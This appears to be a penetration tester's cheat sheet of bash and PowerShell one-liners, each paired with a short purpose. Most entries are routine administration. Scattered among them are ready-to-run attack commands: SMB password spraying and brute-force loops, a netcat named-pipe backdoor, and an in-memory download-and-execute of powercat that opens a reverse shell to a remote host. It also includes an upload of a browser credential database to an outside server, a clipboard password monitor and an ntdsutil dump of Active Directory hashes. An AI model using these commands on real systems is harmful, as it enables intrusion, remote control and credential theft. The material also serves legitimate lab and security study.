One-Liners
Quick fast and speedy
Command | Purpose |
GREENIE=haha; export GREENIE | Create an environment var, then export var to be available to other programs |
PATH=$PATH:/root/haha | Appends a folder to PATH while retaining the existing entries |
sort | uniq -c | sort -n | Takes stdin, sorts it, counts the occurrences of each unique value, then sorts by that count |
cat squid_access.log | sort -k 2 | head | The sort -k parameter sorts on the second column of the output |
wc -l [lines] / wc -c [bytes] / wc -w [words] | Count lines/bytes/words in a file or from stdin |
awk '{print $1,$4}' | Print fields (columns) 1 and 4 (not zero indexed) from stdin |
awk '{print $(NF-1)}' | print the 2nd to last column |
awk '{print length, $1}' | Print the length of each line, followed by its first field |
awk '{ sum += $1 } END { print sum }' | Takes the lines from a file/stdin and adds up the values, quick and dirty calculator in terminal |
cat peptides.txt | while read line; do echo $line; done | Read in lines from peptides.txt, then perform echo for each line. Useful to loop through commands for a list of items |
cat users.txt | while read i; do echo trying $i; smbmap -u '$i' -p '$i' -H 10.10.10.172; done | Password spraying using a bash loop |
for i in {1..5}; do echo $i; done | Loops from 1 to 5 and echos for each value of i |
for i in {000..999}; do echo KEY-HAHA-$i; done | Creates a list of all values from KEY-HAHA-000 to KEY-HAHA-999 |
TF=$(mktemp -d) | Create a temporary directory (e.g. /tmp/tmp.gq9gT5U3) and assign its path to the variable TF |
${#TF} | bash expands this to the number of characters in the TF variable |
sed 's/12/13/g' | Replace 12 with 13 found anywhere in stdin, will replace 1234 with 1334 |
sed -i.bak '/line to delete/d' * | Delete a line of text for all files in a directory |
xxd -p | Print the hex of stdin or a file only, no hexdump format |
xxd -r | Interpret raw hex from stdin, can redirect to save the result to a file |
tr -d '\r' | tr -d '\n' | xxd -r -p | Takes hex input, removes newlines, and converts it back to raw bytes; redirect the output to place it into a file |
find / -user Matt 2>/dev/null | Find all files owned by Matt on the box, redirects stderr to null |
find /etc -type f -name 'apache2.*' | Find any file whose name begins with apache2. in /etc |
grep -E "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" | grep with regex to match any valid IP address (yes it's ugly) |
curl -d "param1=value&param2=value" https://example.com/resource.cgi | Send parameters with curl |
date -d @1286536308 | convert an epoch timestamp to date output |
mknod backpipe p; /bin/bash 0<backpipe | nc -l -p 8080 1>backpipe | Create netcat backdoor without -e support. Generates a named pipe to funnel data |
tar -zcvf files.tar.gz /var/log/apache2 | Creates a files.tar.gz archive of all files in /var/log/apache2 |
prips 10.10.10.0/24 | Prints all IPs in a specific subnet |
ifconfig eth0 169.254.0.1 netmask 255.255.0.0 broadcast 169.254.255.255 | assign an IP from terminal |
ifconfig eth0 down; ifconfig eth0 hw ether 00:11:22:33:44:55; ifconfig eth0 up | change MAC for interface |
dhclient eth0 | request DHCP address |
dd if=./input.file of=./outfile | make a bit-by-bit copy of a file or system |
sudo ln -s /usr/bin/python3 /usr/bin/python | create a symbolic link for python to run python3 |
sudo mkdir /mnt/new; sudo mount /dev/sdb1 /mnt/new; sudo umount /dev/sdb1 | mount/unmount a filesystem |
sudo route add -net default gw 10.10.0.1 netmask 0.0.0.0 dev wlan0 metric 1 | Add another default route with a higher metric to choose a different interface to access the Internet |
sudo dhclient wlan0 | Request a new DHCP lease on interface wlan0 |
openssl enc -aes-256-cbc -salt -in file.txt -out file.txt.enc | encrypt a file with a password at the commandline |
openssl enc -aes-256-cbc -d -in file.txt.enc -out file.txt | decrypt a file using a password at the commandline |
Command | Purpose |
get-childitem -hidden | See hidden files in current dir |
gci -recurse C:\ | % { select-string -path $_ -pattern password} 2>$null | search through all files in C:\ for the string password |
1..255 | % {ping -n 1 192.168.0.$_ | sls ttl} | Counting loop for ping sweep |
(New-Object System.Net.Webclient).DownloadFile("http://10.1.1.1:8000/nc.exe","C:\nc.exe") | Downloads a file to the C:\ location |
IEX(New-Object System.Net.Webclient).DownloadString('http://10.1.1.1:8000/powercat.ps1');powercat -c 10.1.1.1 -p 8001 -e powershell.exe | download a ps1 file and execute it in MEMORY only |
certutil -hashfile ntds.dit md5 | Hash a file |
certutil -encodehex ntds.dit ntds.hex | Encode a file as hex |
certutil -encode test.jpg test.base64; certutil -decode test.base64 test.jpg | Encode and decode a file as base64 |
@FOR /F %p in (pass.txt) DO @FOR /F %n in (users.txt) DO @net use \\SERVERIP\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\SERVERIP\IPC$ > NUL | Dirty looping command to gather a list of users and passwords to bruteforce a server on SMB |
Invoke-RestMethod -Uri http://10.10.14.28:8000/ -Method Post -InFile copy_cert9.db -UseDefaultCredentials | Sends the file to a server, catch the file on the other end |
iwr -uri http://10.10.14.27/SharpHound.ps1 -outfile SharpHound.ps1 | Download a file from another machine |
$x=""; while ($true) { $y=get-clipboard -raw; if ($x -ne $y) { write-host $y; $x=$y } } | Powershell - monitors the clipboard and prints to the screen as items are placed on it (passwords!!) |
ntdsutil activate instance ntds ifm create full C:\ntds quit quit | Use built-in ntdsutil tool to obtain the SYSTEM registry and hive data as a backup, contains user hashes to crack |